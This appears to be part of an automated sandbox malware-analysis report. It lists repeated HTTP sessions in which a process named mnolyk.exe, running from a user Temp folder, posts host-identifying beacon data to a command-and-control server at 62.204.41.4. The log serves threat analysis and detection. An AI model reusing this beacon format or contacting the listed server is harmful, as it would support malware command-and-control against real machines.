                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      775 | 192.168.2.7 | 50470 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:28.297772884 CET | 890 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.361551046 CET | 890 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      776 | 192.168.2.7 | 50471 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:28.534173965 CET | 891 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.599333048 CET | 891 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      777 | 192.168.2.7 | 50472 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:28.781018019 CET | 892 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.845155001 CET | 892 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      778 | 192.168.2.7 | 50473 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:29.015985966 CET | 893 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.081521988 CET | 893 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      779 | 192.168.2.7 | 50474 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:29.268969059 CET | 894 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.332952976 CET | 894 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      78 | 192.168.2.7 | 49773 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:22.191272974 CET | 193 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.257436037 CET | 193 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      780 | 192.168.2.7 | 50475 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:29.511990070 CET | 895 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.575716972 CET | 895 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      781 | 192.168.2.7 | 50476 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:29.753559113 CET | 896 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.817495108 CET | 896 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      782 | 192.168.2.7 | 50477 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:29.999027967 CET | 897 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:30.062169075 CET | 897 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      783 | 192.168.2.7 | 50478 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:30.234168053 CET | 898 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:10:30.297786951 CET | kBytes transferred: 898 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      79192.168.2.74977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:22.447557926 CET194OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.509736061 CET194INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.74970262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.497684956 CET112OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.560082912 CET112INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      80192.168.2.74977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:22.751530886 CET195OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.830991030 CET195INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      81192.168.2.74977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.001075029 CET196OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.067475080 CET196INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      82192.168.2.74977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.237313032 CET197OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.300386906 CET197INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      83192.168.2.74977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.476929903 CET198OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.538858891 CET198INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      84192.168.2.74977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.701654911 CET199OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.763823032 CET199INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      85192.168.2.74978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.953445911 CET200OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.016743898 CET200INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      86192.168.2.74978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.188555956 CET201OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.251075029 CET201INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
